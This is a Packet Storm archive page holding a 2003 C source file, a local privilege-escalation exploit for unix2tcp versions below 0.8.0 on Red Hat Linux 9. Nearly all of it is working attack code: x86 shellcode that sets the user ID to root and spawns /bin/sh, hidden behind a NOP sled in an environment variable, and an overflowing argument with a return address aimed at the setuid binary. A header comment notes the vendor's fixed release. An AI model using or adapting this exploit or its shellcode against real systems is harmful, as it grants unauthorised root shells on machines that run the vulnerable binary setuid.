exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

exp_unix2tcp.c

exp_unix2tcp.c
Posted Dec 24, 2003
Authored by n2n | Site eos-india.net

Exp_unix2tcp.c is a local exploit for unix2tcp below v0.8.0 which gives root access if unix2tcp is setuid, which it is usually not. Tested on Redhat Linux 9.

tags | exploit, local, root
systems | linux, redhat
SHA-256 | 090081e4d5414fd808dae2631f05e4e974bba1a9cb222618b3b73d8dbae56e84

exp_unix2tcp.c

Change Mirror Download
/*
Lame local exploit for unix2tcp(<0.8.0) , http://dizzy.roedu.net/unix2tcp/
by n2n@linuxmail.org,
Eye On Security Research Group [India], http://www.eos-india.net
Tested on Redhat Linux 9.0
Not of much use unless unix2tcp is installed suid.
Solution: The vendor has released a fixed version (0.8.0), available at:
http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.gz
http://dizzy.roedu.net/unix2tcp/unix2tcp-0.8.0.tar.bz2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFSIZE 122
#define VULN "/usr/bin/unix2tcp"
#define RET 0xbffff8e6

char shellcode[]=
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80";

int main(int argc,char **argv)
{
char *buf;
unsigned long ret = RET;
int offset=0;
char egg[2048];
int bufsize=BUFSIZE;

printf("*********************************\n");
printf("Exploit by n2n(n2n@linuxmail.org)\n");
printf(" http://www.eos-india.net\n");
printf("*********************************\n\n");

if (argc>1) bufsize=atoi(argv[1]);
if (argc>2) offset=atoi(argv[2]);

buf=(char *)malloc((bufsize+10)*sizeof(char));
ret = RET + offset;

memset(egg, 0x90, 2048);
memcpy ((egg+(2048-strlen(shellcode)-1)), shellcode, strlen(shellcode));
setenv("payload", egg, 1);

memset(buf,0x41,bufsize+10);
memcpy(buf+bufsize,(char *)&ret,4);
buf[bufsize+4] = 0x00;
execl(VULN,VULN,buf,"31337","31337",0);
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close